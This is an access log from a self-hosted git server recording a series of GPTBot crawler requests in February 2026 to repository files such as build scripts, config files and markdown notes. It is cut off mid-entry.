GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153741] [Gzip 15.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18931] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:51:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10066] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:51:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16083] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:51:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:51:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:14:51:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:51:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:51:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:51:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fdocker-compose.yml" [Client 74.7.227.38] [Length 23763] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" +[17/Feb/2026:14:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fmain.py" [Client 74.7.227.38] [Length 49565] [Gzip 8.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" +[17/Feb/2026:14:51:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2f.venv" [Client 74.7.227.38] [Length 19370] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" +[17/Feb/2026:14:51:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb.diff" [Client 74.7.227.38] [Length 128761] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:14:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:14:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:14:51:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/favicon.ico" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:14:51:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/bearing.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:14:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fdocker-compose.yml" [Client 74.7.227.38] [Length 22574] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:14:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode" [Client 74.7.227.38] [Length 10335] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:14:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main" [Client 74.7.227.38] [Length 15467] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/graph" +[17/Feb/2026:14:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main" [Client 74.7.227.38] [Length 5324] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/branches" +[17/Feb/2026:14:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml" [Client 74.7.227.38] [Length 96315] [Gzip 10.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:14:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 22510] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf" +[17/Feb/2026:14:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fglobal.json" [Client 74.7.227.38] [Length 21270] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" +[17/Feb/2026:14:51:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" +[17/Feb/2026:14:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.vscode" +[17/Feb/2026:14:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/branch/main" [Client 74.7.227.38] [Length 7460] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:14:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" +[17/Feb/2026:14:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10873] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" +[17/Feb/2026:14:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19490] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" +[17/Feb/2026:14:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" +[17/Feb/2026:14:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" +[17/Feb/2026:14:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" +[17/Feb/2026:14:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 74.7.227.38] [Length 9862] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" +[17/Feb/2026:14:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" +[17/Feb/2026:14:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 24633] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:14:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 